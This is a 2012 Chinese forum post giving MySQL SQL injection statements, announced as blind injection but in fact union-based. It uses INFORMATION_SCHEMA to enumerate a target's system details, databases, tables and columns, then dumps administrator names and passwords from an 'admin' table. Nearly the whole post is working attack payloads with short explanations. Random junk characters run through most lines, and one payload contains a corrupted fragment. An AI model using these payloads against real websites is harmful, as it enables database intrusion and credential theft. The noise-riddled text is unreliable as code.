本文介绍MYSQL盲注的一些语句和方法
; r7 Z3 V N$ b- [! R: B! Q" H H
学习盲注前先了解下 IFORMATION_SCHEMA 库
$ l" z/ d4 k7 q, G9 M$ L8 L* q2 E5 F" n. Q& ^+ q
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有$ P6 a: G9 M; b3 A. I d9 N
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
5 s4 ]% W9 ~9 a1.得到所有数据库名:
. A% n* ]1 S l, }. G" E: X( Z|SCHEMATA ->存储数据库名的表
7 G* L, P: b6 L) s6 f/ t6 @7 k|---字段:SCHEMA_NAME ->数据库名称
6 n7 S4 g9 @1 S% n* [. X
' M9 R+ g" }; o( o0 W|TABLES ->存储表名) ]2 i* b5 E& g/ z+ l
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
5 P# _" c8 U. Q s2 ~|---字段:TABLE_NAME ->存储表的表名6 L- w6 \+ }8 S) g) G+ C
, o, |0 [, X6 x8 P! t) N
|COLUMNS ->存储的字段名表0 r6 V, A: ]( r0 p$ j. o* l
|---字段:TABLE_SCHEMA ->该字段所属数据库名, y) G6 V; l8 o; U' a: }+ W
|---字段:TABLE_NAME ->存储所属表的名称0 Z& b. N6 m& K( Q3 [; F( b
2 Y9 t @% q" B m+ U v2 {|---字段:COLUMN_NAME ->该字段的名称; ^! X2 v& |8 B: H: K
O* a8 Z4 S3 k2 I% J& ?+ y
. x) O, A6 ]( i
" i- I; p6 `! b: m2 j$ K7 O###########################################################################, p$ A% R/ w) o7 f
: A/ H$ D- {6 N, K+ {' ]% H l0x001 获取系统信息:0 K3 Y1 |7 Z; `
8 Y% c- S& K5 |$ \' C& I. R
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
5 n% C% k7 g# V1 A- n) ?, ]/ i H6 u1 L7 O: R: i$ M
/*
. X8 {1 j! j/ j9 I1 p9 j: M% _0 r; P2 t% ]( }4 }
@@global.version_compile_os 获取系统版本
* _7 }0 u6 x/ E0 {9 s1 B" g/ ?# W& |- x5 k, Z
@@datadir 数据库路径( k$ l. C: ~3 }) n; k" n6 S
database() 当前数据库名称! u& E+ D: P* J8 v Q! k& Z
0x3c62723e 换行HEX值* v9 H3 Q/ r' p& X: F0 ~
# H# z8 a4 ?! @ C! @
*/
: n0 j g: Q( r
0 _& U, P5 ?7 R1 }7 v8 g 1 ?$ P' Z$ A, {! Q# i3 O
/ m; H' Q: w$ i( [; K5 X9 B######################################################################
7 T- P. p9 z: ?' e5 k3 |$ c, _) j4 K% ]
0x002 获取表名
! w/ a2 S8 r; ~" x+ S
( f8 L2 ~; I4 L4 r3 gunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
$ d* O8 T7 Z! T7 g1 t: i
6 W1 `8 A4 F9 p; h ; Z; J9 U& a O/ \
: J9 H1 t& d2 Y! b; H# T% K$ o
/*$ f6 t: M* P+ [7 d/ b
5 V9 F. s3 X# ^# k
0x67617264656e 为当前数据库名
, H, q/ L" e z# a
6 K6 Q) j8 r6 i# C8 A! Ggroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
1 W' O- t0 t* |6 A L# ?/ k0 p5 R/ E- `( ^! |
*/
& C9 _% V, p. X+ j9 M( I+ o9 p: o+ a5 L ?: ~* a0 f+ B. l
######################################################################/ V3 d, ^* e" d
% D/ e; x( e2 S. H" b, Q/ v: n
, D( F; t+ H# j Q8 Y3 g8 \* R
( K2 T7 v6 a0 Q0x003 获取字段
1 x8 B) A; }8 l* q% H
8 N6 D. B- t% s3 |3 w8 h" B/ X+ Sunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) g) N# m* h5 Z e1 d2 U* \" z1 {3 h; _: \
/*
q6 ~9 G/ j" Z" _8 O
1 y7 S) h4 M% a* W K; O( s- X, }group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
2 K5 S" O, Q( \0 Q2 C9 L5 f7 h; D& M' E& g, o$ Z8 b
0x61646d696e ->选择一个表% v6 B, Z; v* A4 O; E- N+ n& ?& {
7 O8 L! k3 O6 [! S
0x67617264656e ->数据库名6 U R Z1 C$ h& E
" w3 C1 H* ]- n*/5 m& V% T" Z/ |' F8 y0 e! q; h
$ i% Q2 b) {- e: g& W
#####################################################################( m2 t9 l3 y& S8 p. l) }5 U
5 x' G/ \+ l i, }3 z2 z7 n " ?! o+ X/ j" A2 Y
3 H, L. i$ m" I& x' e
0x004 获取数据
% h' r* W1 \0 z
1 M2 s Q- X; i/ Yunion select 1,2,3* G5 U0 n+ E4 C
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
& b* X' d! c9 \! b* H
$ X% {% M2 x/ ]union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
, t1 |8 F4 K5 N9 l( C
' c2 `# N5 @' {: \ ' C( a- i. j# b
6 _" Z/ \- n" k/*
1 d9 V+ U' N; u1 ^) R( e" T
g) s2 F3 V7 Q' W0x3c62723e 换行符号HEX编码
( C0 S% S1 Y& n5 h& p
6 P) G7 n1 u# u, l8 t! i: Z bgroup_concat 同时获得该字段所有数据
$ h# r, v8 X% L O& ~: z2 j* t7 }0 }; v- b( }' m3 p
*/6 a7 }& G: ~& g7 J( K
9 r- D% ]: n9 D9 C0 k* M. N; ] |
发表于 2012-9-13 17:48:44
收藏
支持
反对